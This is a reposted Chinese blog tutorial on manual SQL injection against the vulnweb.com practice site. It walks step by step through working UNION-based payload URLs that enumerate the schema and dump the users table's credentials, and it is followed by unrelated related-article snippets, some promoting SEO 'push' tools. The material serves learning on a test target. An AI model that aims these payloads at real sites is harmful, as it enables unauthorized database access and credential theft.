SQL手工注入网站笔记

news/2024/5/11 13:12:24/文章来源:https://blog.csdn.net/swaggy_tt/article/details/110558254

SQL手工注入网站笔记

目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1
在这里插入图片描述
1.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=1’
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=1 永真条件,回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=2 永假条件,回显空白界面

2.猜字段:
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11 回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12 回显报错
故共有11个字段

3.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11
在这里插入图片描述
即可判断,注入点可以为11,7,2,9

4.查询数据库版本:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version()
在这里插入图片描述

数据库版本在5.0 以上,则会存在一个information_schema库存放所有表名称。

5.查数据库名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,database()
在这里插入图片描述
可得知数据库名称为:acuart

6.查表名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,table_name from information_schema.tables where table_schema=“acuart”
以上默认查数据库中第一个表名
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=“acuart”
查询该数据库中所有表名
在这里插入图片描述

7.查表的字段:
根据经验我们可以猜测 账号密码信息放置于users表中。
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_schema=“acuart” and table_name=“users”
在这里插入图片描述
8.查询users表中的uname,pass
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,pass,3,4,5,6,uname,8,9,10,11 from users
在这里插入图片描述由此获得账号:test 密码:test

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_891410.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2012.08.11青岛浩鑫机械网站被收录了,分享一下经验!

前些日子,刚做的网站,刚开始不知道怎么做才能收录,到QQ群里搜SEO群加,咨询他们,然后得出的结论: 青岛浩鑫机械厂-中国喷水织机生产基地!SEO信息百度权重 Google 反链数:0 响应时间: 469毫秒域名IP…

IIS6.0怎么架设一个网站

IIS6.0架设一个网站,其实还是很简单的,只要按照操作步骤,就能实现。 第一步,安装IIS6.0。 IIS6.0一般都是装在windows2003系统上,所以要先下载IIS6.0文件包,20M左右,下载完成后,打开…

网站排名记录[2013.01.02]

橡胶坝 围油栏 橡胶水坝

Python爬虫网站多页电影名和评论

爬取豆瓣电影的电影数据,具体爬取的是电影名和被评论的内容 import requests import re for i in range(1,6):index(i-1)*20url"https://movie.douban.com/review/best/?start{}".format(index)d{"User-Agent": "Mozilla/5.0 (Windows NT…

互联网网站的架构演进

简单介绍了从单机网站到微服务网站的演进,从概念上讲述了什么是微服务。 资源链接https://www.slidestalk.com/s/internet_architecture_revolution 更多优质资源 (示说网)点击登录即可免费下载

【网站可用性自动化监测】python+seleium

【网站可用性自动化监测】pythonseleium 前倾提要:做了网络安全后重保期间需要对用户系统每日进行监测,相关监测脚本网上其实也有很多,但能自己个性化做一下也挺好,太久没做小程序需要写下代码巩固。本次程序开发目的是重保期间每…

快速入门 Codeforces 算法比赛/练习 网站

Codeforces是一家为计算机编程爱好者提供在线评测系统的俄罗斯网站。同时也是广大ACM编程爱好者所喜爱,被使用的网站之一,但是有很多编程小白刚接触此类算法网站,不太熟悉如何使用,这里博主给出快速入门Codeforces的图文教程。 C…

浅谈web网站架构演变过程

前言 我们以javaweb为例,来搭建一个简单的电商系统,看看这个系统可以如何一步步演变。 该系统具备的功能: 用户模块:用户注册和管理商品模块:商品展示和管理交易模块:创建交易和管理 阶段一、单机构建网站…

nodejs 进行网站监听时 不用在cmd停止后重启 网页刷新就能改变页面内容的工具

一、nodejs的软件需求——supervisor 我们使用nodejs开启服务器时,我们会在cmd里输入node xxx.js进行开启服务器。 很多时候我们会根据页面的逻辑和对项目的要求,进行对xxx.js文件内容的修改,但这时如果我们修改内容后保存,我们…

Web2.0网站介绍——个性化主页服务网站

随着Web2.0网站的不断涌现,越来越多的用户希望自己使用的服务具有极高的可定制性,在这种需求下,出现了越来越多的个性化主页服务网站。这些个性化 主页服务具有极高的可定制性,并且提供很多个性化的功能可供选择,这里就…

大型网站架构演变和知识体系

之前也有一些介绍大型网站架构演变的文章,例如LiveJournal的、ebay的,都是非常值得参考的,不过感觉他们讲的更多的是每次演变的结果,而没有很详细的讲为什么需要做这样的演变,再加上近来感觉有不少同学都很难明白为什么…

百度SEO反推软件下载,反推是什么

2020最新百度SEO反推软件下载 使用反推技术,使你的网站秒引蜘蛛秒收录 使用说明: 1.导入链接,开头必须带http://,末尾必须带/,一行一条 2.导入你的百度账号COOKIE,一行一条 3.接入打码平台 4.即刻开启秒收…

百度SEO逆推技术软件下载,引蜘蛛秒收录

2020最新百度SEO逆推软件下载 使用逆推技术,使你的网站秒引蜘蛛秒收录 使用说明: 导入链接,开头必须带http://,末尾必须带/,一行一条导入你的百度账号COOKIE,一行一条接入打码平台即刻开启秒收录 逆推是…

百度SEO主动推送工具软件下载

百度SEO主动推送工具助手分享下载,可以挂机定时推送和生成链接推送 下载地址: 链接:https://www.lanzoui.com/b01horyih 密码:clrf

不是汽车之家太牛,而是其他网站太懒

汽车之家上市了,而且市值高达30亿美金,跌破了很多垂直网站的眼镜。一时之间网络上到处都在讨论汽车之家,不少垂直网站的老大问我:"秦刚,你99年就开始做垂直网站,操盘过太平洋电脑网,太平洋…

用Meta标签代码让360双核浏览器默认极速模式打开网站不是兼容模式(顺带解决很多兼容性问题)

浏览模式 极速模式、兼容模式及IE9高速模式是360浏览器显示网页时使用的三种模式: 表示极速模式 表示兼容模式 表示IE9/IE10模式(仅在安装了IE9或IE10后可用) 360极速浏览器会自动为您选择使用适合每个网站的浏览模式。所以,…

linux下网站目录权限如何设置?

网站目录权限如何设置不当很容易导致站点被挂马和被篡改,正确的目录权限设置应当遵循最小权限原则。比如对于网站的目录,一般给644权限即可,而文件夹设置为755权限即可。 以nginx服务为例,假设站点用户和用户组为www&…

Win下安装IIS后不能正常浏览asp脚本的网站-解决方法如下

转载: 在新灌的Windows 7中要使用IIS 7環境,並且要撰寫ASP程式,必須要先手動啟動一些設定值,因為Windows 7在安裝時,很多項目是預設沒有開啟的。 1.選取在控制台中的程[程式和功能]中的[開啟和關閉Windows功能]選項。 …

网站首页head区代码规范!

head区是指首页HTML代码的< head>和</ head>之间的内容。 1.公司版权注释 阅读 编辑 运行 复制 保存 <!-- The site is designed by Maketown,Inc 06/2000 --> <!-- The site is designed by Maketown,Inc 06/2000 --> 2.网页显示字符集 简体中文&am…

【特别推荐】学习 Web 开发技术的16个最佳教程网站和博客

【特别推荐】学习 Web 开发技术的16个最佳教程网站和博客 互联网经过这么多年的发展&#xff0c;已经出现了众多的 Web 开发技术&#xff0c;像 .Net/Java/PHP/Python/Ruby 等等。对于 Web 开发人员来说&#xff0c;不管是初学者还是有一定经验的开发人员都需要时刻学习新的开发…